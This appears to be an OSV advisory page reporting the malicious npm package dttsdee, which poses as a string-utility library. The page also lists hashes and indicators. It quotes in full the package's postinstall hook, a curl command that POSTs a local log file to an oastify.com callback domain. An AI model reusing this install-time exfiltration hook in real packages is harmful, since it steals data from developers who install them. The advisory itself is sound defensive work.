MAL-2026-6462

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dttsdee/MAL-2026-6462.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6462
Published
2026-06-25T10:51:03Z
Modified
2026-06-25T16:31:23.307539782Z
Summary
Malicious code in dttsdee (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9)

package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$(cat /data/logs/monitor-2026-06-25.log)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data. The hook reads a file from the installer's filesystem and POSTs its contents over cleartext HTTP to an attacker-controlled subdomain on oastify.com (Burp Suite's Collaborator out-of-band callback service, commonly used for data exfiltration and SSRF research). The package advertises itself as a string-utility library (easy-string-kit in source) but is published under the unrelated name dttsdee with empty author/repository/homepage/bugs metadata; the innocuous string-helper code in index.js is cover for the install-time exfiltration. The combination of generic placeholder metadata, mismatched name/internal-description, and an automatic OOB exfil beacon on a researcher/attacker callback domain is a throwaway malicious package (likely dependency-confusion PoC or active attack).

Source: ossf-package-analysis (4c2da603726677a712bcd1e3ce798e5b3f2eed115827085596589c40613e9ad6)

The OpenSSF Package Analysis project identified 'dttsdee' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "4c2da603726677a712bcd1e3ce798e5b3f2eed115827085596589c40613e9ad6",
            "import_time": "2026-06-25T11:27:35.79112341Z",
            "modified_time": "2026-06-25T10:51:03Z",
            "source": "ossf-package-analysis",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9",
            "import_time": "2026-06-25T16:23:39.779247729Z",
            "modified_time": "2026-06-25T16:09:34Z",
            "id": "IN-MAL-2026-007509",
            "versions": [
                "1.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / dttsdee

Package

Affected ranges

Affected versions

1.*
1.0.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "dttsdee-1.0.0.tgz",
            "hashes": {
                "sha1": "9a2690c9c1114761471480c87e47edaf373ce012",
                "sha512_sri": "sha512-GClNgEVcW5emUn5hrcTYpjiZcQTj/MWhS4L+9z98i4CA9cwE3S9e8O761lYczdp2uXat6sbnJjTiUQbsZwVFhg=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "4c01cb18c6745d3315d86b30bdab0a42b112ae5709043c0977c3812c0faf7af51fe62d",
            "sha256": "f191101d2692e8d9f0e8cf68bff87e14075ee3c658c4388ab45a1849ebfc9210",
            "path": "package.json"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dttsdee/MAL-2026-6462.json"